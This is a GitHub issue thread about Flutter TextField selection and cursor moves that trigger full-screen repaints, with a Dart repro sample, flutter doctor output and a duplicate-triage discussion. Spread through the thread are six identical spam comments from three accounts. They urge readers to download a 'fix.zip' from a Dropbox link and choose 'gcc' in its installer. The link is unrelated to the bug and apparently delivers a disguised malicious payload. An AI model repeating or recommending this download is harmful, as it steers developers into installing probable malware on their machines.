### ISSUE TITLE
Select, change the location of the cursor, keyboard select all  text on TextField will cause the whole screen repaint 

### ISSUE THREAD

**Issue by SuicaLondon** [flutter/flutter#154081]
### Steps to reproduce

This is an issue that exists for a while.

1. Open the widget inspector
2. Enable the repaint highlight border
3. Do any behaviors below
  1. Click the TextField and select all (Not sure if this is an issue)
  2. Use the keyboard `Command` + `A` to select all
  3. Long press the `Space` key to change the position of the cursor

### Expected results

Only the TextField repaint border is highlighted.

### Actual results

Not only the TextField repaint border is highlighted, but also the screen border.

### Code sample

<details open><summary>Code sample</summary>

```dart
import 'package:flutter/material.dart';

void main() {
  try {
    runApp(const MyApp());
  } catch (error, stackTrace) {
    print('$error $stackTrace');
  }
}

class MyApp extends StatelessWidget {
  const MyApp({super.key});

  // This widget is the root of your application.
  @override
  Widget build(BuildContext context) {
    return MaterialApp(
      title: 'Flutter Demo',
      theme: ThemeData(
        colorScheme: ColorScheme.fromSeed(seedColor: Colors.deepPurple),
        useMaterial3: true,
      ),
      home: const MyHomePage(title: 'Flutter Demo Home Page'),
    );
  }
}

class MyHomePage extends StatefulWidget {
  const MyHomePage({super.key, required this.title});

  final String title;

  @override
  State<MyHomePage> createState() => _MyHomePageState();
}

class _MyHomePageState extends State<MyHomePage> with TickerProviderStateMixin {
  @override
  Widget build(BuildContext context) {
    return Scaffold(
      appBar: AppBar(
        backgroundColor: Theme.of(context).colorScheme.inversePrimary,
        title: Text(widget.title),
      ),
      body: Center(
        child: RepaintBoundary(
          child: Container(
              width: 300,
              height: 40,
              decoration: BoxDecoration(
                  border: Border.all(color: Colors.black, width: 1)),
              child: const TextField(
                decoration: InputDecoration(
                    contentPadding: EdgeInsets.all(4),
                    hintText: "Please input something"),
              )),
        ),
      ),
    );
  }
}

```

</details>

### Screenshots or Video

<details open>
<summary>Screenshots / Video demonstration</summary>

1. Click the TextField and select all

https://github.com/user-attachments/assets/d8d6070c-8270-41cf-b6cb-e44b626d06d5

2. Use the keyboard `Command` + `A` to select all
There is an issue found on Simulator, but not be able to reproduce 100%. On iPadOS, the `Command` + `A` is totally not working on the simulator.
<img width="1015" alt="Screenshot 2024-08-26 at 12 55 18 AM" src="https://github.com/user-attachments/assets/cf2af3ce-0330-4760-9ad1-2a999aedcaef">

Here is the video for macOS

https://github.com/user-attachments/assets/e1ce0f4e-83fd-4b3b-b225-527a4de22f03

3. Long press the `Space` key to change the position of the cursor

https://github.com/user-attachments/assets/189c2235-e2e2-4fa5-b826-de858eccb89c

</details>

### Logs

<details open><summary>Logs</summary>

```console
[Paste your logs here]
```

</details>

### Flutter Doctor output

<details open><summary>Doctor output</summary>

```console
[✓] Flutter (Channel master, 3.24.0-1.0.pre.440, on macOS 15.1 24B5024e darwin-arm64, locale en-US)
    • Flutter version 3.24.0-1.0.pre.440 on channel master at /Users/suica/flutter
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision a3bbb24dd5 (3 weeks ago), 2024-08-05 07:10:31 -0400
    • Engine revision 0aac603420
    • Dart version 3.6.0 (build 3.6.0-114.0.dev)
    • DevTools version 2.38.0

[✓] Android toolchain - develop for Android devices (Android SDK version 35.0.0)
    • Android SDK at /Users/suica/Library/Android/sdk
    • Platform android-35, build-tools 35.0.0
    • Java binary at: /Applications/Android Studio.app/Contents/jbr/Contents/Home/bin/java
    • Java version OpenJDK Runtime Environment (build 17.0.10+0-17.0.10b1087.21-11609105)
    • All Android licenses accepted.

[✓] Xcode - develop for iOS and macOS (Xcode 15.4)
    • Xcode at /Applications/Xcode.app/Contents/Developer
    • Build 15F31d
    • CocoaPods version 1.15.2

[✓] Chrome - develop for the web
    • Chrome at /Applications/Google Chrome.app/Contents/MacOS/Google Chrome

[✓] Android Studio (version 2024.1)
    • Android Studio at /Applications/Android Studio.app/Contents
    • Flutter plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 17.0.10+0-17.0.10b1087.21-11609105)

[✓] VS Code (version 1.92.1)
    • VS Code at /Applications/Visual Studio Code.app/Contents
    • Flutter extension version 3.94.0

[✓] Connected device (5 available)
    • iPhone 15 Pro Max (mobile)      • 3769C520-F736-476F-9552-9A7DF8470439 • ios            • com.apple.CoreSimulator.SimRuntime.iOS-17-5
      (simulator)
    • macOS (desktop)                 • macos                                • darwin-arm64   • macOS 15.1 24B5024e darwin-arm64
    • Mac Designed for iPad (desktop) • mac-designed-for-ipad                • darwin         • macOS 15.1 24B5024e darwin-arm64
    • Chrome (web)                    • chrome                               • web-javascript • Google Chrome 127.0.6533.120

[✓] Network resources
    • All expected network resources are available.
```

</details>

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by huycozy** [comment]
Thanks for the report! 

This is similar to an issue at https://github.com/flutter/flutter/issues/146338. Per https://github.com/flutter/flutter/issues/146338#issuecomment-2043299781, if you have a specific case that raises a performance issue, please file a new issue. Thanks!

Closing this issue as a duplicate.

**Comment by SuicaLondon** [comment]
@huycozy Hi I think that the issue is not 100% the same. As I mentioned at the beginning, the issue #146338 seems to be fixed already. Previous covering RepaintBoundary doesn't prevent the repaint of the whole screen, we have to wrap the TextField with Stack. This issue seems to be fixed already, at least RepaintBoundary works.

This issue is something similar and different that some other manipulation can also cause repaint. I don't agree with just close this ticket simply.

**Comment by huycozy** [comment]
>As I mentioned at the beginning, the issue https://github.com/flutter/flutter/issues/146338 seems to be fixed already.

I can't see this mentioned there. Which comment on that issue do you see that the issue "seems to be fixed"?

**Comment by SuicaLondon** [comment]
@huycozy Very sorry for that mistake, I may deleted it when I submitted. I noticed the issue [#146338](https://github.com/flutter/flutter/issues/146338) long time ago, and recently found that `RepaintBoundry` works now. As you can see in the video below.

https://github.com/user-attachments/assets/5866268a-1cf4-4abb-9017-9cde2ef5cdc3

And that is for the text input, and the problem I mentions in this issue is similar but that issue does not mentioned.

These behavior will trigger the whole screen repaint now: 
1. When user trigger the focus event
2. When user click any button below (Copy, select all)
<img width="317" alt="Screenshot 2024-08-28 at 12 11 40 PM" src="https://github.com/user-attachments/assets/6d4121fd-6491-435d-8a44-79ea188fb943">
3. When user connect to physical keyboard and press `Command` + `A`
4. When user use digital keyboard and press `space` to move cursor in the TextField

**Comment by huycozy** [comment]
>but it still have some other issues in the ticket and https://github.com/flutter/flutter/issues/146338 did not mention.

Thanks for the update. The cases you shared are all around TextField and keyboard. Please see  https://github.com/flutter/flutter/issues/146338#issuecomment-2043299781. That being said if this causes a performance issue, please file an issue with a specific case for it.
